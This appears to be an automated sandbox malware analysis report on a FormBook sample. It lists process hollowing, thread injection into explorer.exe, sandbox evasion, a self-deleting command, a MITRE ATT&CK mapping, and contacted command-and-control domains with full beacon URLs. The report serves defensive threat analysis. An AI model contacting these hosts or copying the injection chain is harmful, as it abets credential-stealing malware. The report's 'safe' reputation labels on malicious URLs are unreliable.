          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04808ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04768E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.shitarpa.net
Source: C:\Windows\explorer.exe Domain query: www.northsytyle.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.242.153 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 170.39.76.111 80
Source: C:\Windows\explorer.exe Domain query: www.houseofsisson.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\2435.exe Section loaded: unknown target: C:\Users\user\Desktop\2435.exe protection: execute and read and write
Source: C:\Users\user\Desktop\2435.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\2435.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Users\user\Desktop\2435.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\2435.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\2435.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\2435.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 340000
Source: C:\Users\user\Desktop\2435.exe Process created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'
Source: explorer.exe, 00000002.00000000.252916263.00000000089FF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000000.237275361.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\2435.exe Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API1 | Path Interception | Process Injection512 | Rootkit1 | Credential API Hooking1 | Security Software Discovery131 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion3 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection512 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Clipboard Data1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information2 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing11 | Cached Domain Credentials | System Information Discovery13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

Behavior Graph ID: 433173 | Sample: 2435.bat | Start date: 11/06/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures

Process tree:
2435.exe (started)
  dropped file: C:\Users\user\AppData\Local\...\System.dll, PE32
  signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  2435.exe (started)
    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    explorer.exe (injected)
      DNS/IP: houseofsisson.com 170.39.76.111, 49722, 80 PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY Reserved; www.northsytyle.com 199.59.242.153, 49719, 80 BODIS-NJUS United States; 4 other IPs or domains
      signatures: System process connects to network (likely due to code injection or exploit)
      control.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        cmd.exe (started)
          conhost.exe (started)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
2435.exe | 43% | ReversingLabs | Win32.Backdoor.Mokes
2435.exe | 100% | Joe Sandbox ML |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll | 0% | ReversingLabs |

          Unpacked PE Files

Source | Detection | Scanner | Label
1.1.2435.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.2435.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.2435.exe.24d0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.2.control.exe.4d7f834.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
9.2.control.exe.43b090.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.0.2435.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
0.2.2435.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
1.0.2435.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.shitarpa.net/dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e | 0% | Avira URL Cloud | safe
http://www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
www.knighttechinca.com/dxe/ | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.northsytyle.com | 199.59.242.153 | true | true | | unknown
houseofsisson.com | 170.39.76.111 | true | true | | unknown
shitarpa.net | 34.102.136.180 | true | false | | unknown
www.shitarpa.net | unknown | unknown | true | | unknown
www.houseofsisson.com | unknown | unknown | true | | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.shitarpa.net/dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e | false | Avira URL Cloud: safe | unknown
http://www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W | true | Avira URL Cloud: safe | unknown
http://www.houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT | true | Avira URL Cloud: safe | unknown
www.knighttechinca.com/dxe/ | true | Avira URL Cloud: safe | low

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | 2435.exe | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI | control.exe, 00000009.00000002.499880225.000000000526F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | 2435.exe | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                            Contacted IPs


                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.59.242.153 | www.northsytyle.com | United States | 395082 | BODIS-NJUS | true
34.102.136.180 | shitarpa.net | United States | 15169 | GOOGLEUS | false
170.39.76.111 | houseofsisson.com | Reserved | 139776 | PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY | true

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433173
Start date: 11.06.2021
Start time: 12:11:53
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 17s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 2435.bat (renamed file extension from bat to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/4@3/4
EGA Information: Failed
                                            HDC Information:
                                            • Successful, ratio: 23.8% (good quality ratio 22%)
                                            • Quality average: 76.3%
                                            • Quality standard deviation: 29.9%
                                            HCA Information:
                                            • Successful, ratio: 89%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SearchUI.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 13.64.90.137, 93.184.220.29, 92.122.145.220, 13.88.21.125, 52.147.198.201, 184.30.20.56, 20.50.102.62, 92.122.213.247, 92.122.213.194, 20.54.26.129
                                            • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433173/sample/2435.exe

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

Match | Associated Sample Name / URL | Detection | Context

Match: 199.59.242.153
New Order Vung Ang TPP Viet Nam.exe | malicious | www.greenshirecommons.com/un8c/?8p=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwuwR4xQFHfof&h6Z=FZOTUTGPt4-
fD56g4DRzG.exe | malicious | www.frontpagesweb.net/w88t/?1bWl=DwAbJomwIIUam/8Lxif0xJyCLP0/MlDCQn/X6EWMKnqqCjXzJeuBHxh9ROI30kSy7fCE&z6z=STRxNL2x
malware300.docm | malicious | ww25.gokeenakte.top/admin.php?f=1&subid1=20210605-2000-3553-b2c5-4eab817b0105
Payment.exe | malicious | www.digitalgamerentals.com/ngvm/?3fl00=eXBfF5JabAMvoJeV+Y5ra8EK8SdWvzGjXwXzLVFQuPc9hZ/16jkYHGAZEYy2Tm7CaklT&9rdLfJ=i48HtpdXmp
PROFORMA INVOICE PDF.exe | malicious | www.chrispricellc.com/owws/?y8z=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6zNTHuB4YMFv&UDKPKv=04i8JpzhsHVX
Order.exe | malicious | www.sweeneysservicecenter.com/jogt/?w6ATB0=U2LhZ94w5IDC+2DErQbRlpD/OzsCIaT6lUf8FwZRqb7l7kFTMUkxaoKrt4WuZdpJEkCM&Jxox=Er6tXhMxl
INQ-741-020621-PDF.exe | malicious | www.hairgrowinggenius.com/pb93/?a0GLMhc=KPEvW4YRciSJiJFFNYizsATDgsgPxpmwnLISCA8VBLwfqs8m2gzQMN5Q9cE7knzB0ifR&rTqL5=0DKH1VwxRB
CONTAINER DEPOSIT.exe | malicious | www.northsytyle.com/dxe/?nPRT_Pn=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W&k6Ad3=_vc0KnhxhJu
Swift copy_9808.exe | malicious | www.scientiagenus.com/p6nu/?C2JdTP=eE7I+Sv8iOFRLyMlwLdgwXijBECgGV3UTircOP7TdIwQdQ324QcldvmuNHuZw5leTbqh&z6nHM=ITnT9Fg
#U20ac9,770 pdf.exe | malicious | www.jobswithsecurityclearance.com/pux4/?Lv0h=3mylV7pVONTMNM6aC/niqCihOZ2+qzoqaVpusSVEetlxoEhqYhjCa0mWM/mNyWLbLdeFpUieiA==&VlKt=wBNl4pd0L
Pdf Scen Invoice 17INV06003.exe | malicious | www.friendsed.com/s5cm/?O2=aT8vL+GQ5CKbWMYK7VfKTGSzb4SrkpvWRcVzxRDty813pzzqsjZ5NUDQNQmBAQnsw0DU&2d=YX9ti2PX
ORDER LIST.pdf.exe | malicious | www.chrispricellc.com/owws/?t8l=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6whQbeNAVt45EvY6Zw==&YBZL=lxldV
quote.pdf.exe | malicious | www.chrispricellc.com/owws/?rVEx8D=S0GhCH&RR=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6whpEvtDb7k+EvY9KA==
hrUbr1mLqzggh0H.exe | malicious | www.poltgroup.com/onqm/?6l=doD+GTTuj0wR7cILLxImcVYaTf1RJOz68mAknHdMm+lQBhaMdEcvcwimwgDNMMFRe7JRpz2F8Q==&2dm=3fklvpq0OPLdJVy
packa.....(1).exe | malicious | www.educationstarcorp.com/wdva/?kfD4qZ=xabDW6gRomVRJCfQhE+1Y8vLHDgRz3GtPRqb2ZQ8ev+ZOg56Covo/3nqdMEaAH6lCy+g&kr0=dbF0vFoPNvL
Pdf MT103 - Remittance.pdf.exe | malicious | www.ultimateplumpudding.co.uk/s5cm/?kR-4q=E2OK2mHSQGkTABA7rh5rFu9YJ97LBg918ZBY5I6VyKJbM1VF4fyc5eTvcYaTxAWeq+U4CfyJeQ==&P0D=Atxturd
henry.exe | malicious | www.booster.guru/aipc/?MZg=BMi4rIX3OaRmAVdWmHwDy158GXvJowW6rsMkLX8T/SeurUfZZjefoMGqIKxJ2f9Kzzfm&zTxX=ApdHHR
Ohki Blower Skid Base Enquiry 052521.exe | malicious | www.greenshirecommons.com/un8c/?vR=Ltxx&5j9=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwtQB3QA9Z6BY
porosi e re Fature Proforma.exe | malicious | www.fux.xyz/nt8e/?v2Mp4=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&jJBP5D=-ZpPy
CamScanner 24.05.2021 10.01.exe | malicious | www.pacificsoucre.com/ainq/?Nji0Xf=8p7tvpAP&mlvx=pIngp1ZjDfSyLzoneSC3xwzm0h2uYzOW09iGJacWdr+L3f1uJRS1s7wexdcfTOtLplEo

Match: 170.39.76.111
Proof of Payment.bat.exe | malicious | www.houseofsisson.com/dxe/?9rTd=b89ptlBx&F48lVPl=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH0luWFwfr74U

                                            Domains

                                             Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                             www.northsytyle.com | CONTAINER DEPOSIT.exe | malicious
                                             • 199.59.242.153
                                             www.northsytyle.com | 03003 NAVEENA.exe | malicious
                                             • 199.59.242.153

                                            ASN


                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                                                                     Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                     C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll
                                                                                     • INVOICE.exe (Detection: malicious)
                                                                                     • Shipment Invoice & Consignment Notification.exe (Detection: malicious)
                                                                                     • KY4cmAI0jU.exe (Detection: malicious)
                                                                                     • 5t2CmTUhKc.exe (Detection: malicious)
                                                                                     • 8qdfmqz1PN.exe (Detection: malicious)
                                                                                     • New Order PO2193570O1.doc (Detection: malicious)
                                                                                     • L2.xlsx (Detection: malicious)
                                                                                     • Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx (Detection: malicious)
                                                                                     • New Order PO2193570O1.pdf.exe (Detection: malicious)
                                                                                     • 2320900000000.exe (Detection: malicious)
                                                                                     • CshpH9OSkc.exe (Detection: malicious)
                                                                                     • 5SXTKXCnqS.exe (Detection: malicious)
                                                                                     • i6xFULh8J5.exe (Detection: malicious)
                                                                                     • AWB00028487364 -000487449287.doc (Detection: malicious)
                                                                                     • 090049000009000.exe (Detection: malicious)
                                                                                     • dYy3yfSkwY.exe (Detection: malicious)
                                                                                     • PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx (Detection: malicious)
                                                                                     • Purchase Order Price List 061021.xlsx (Detection: malicious)
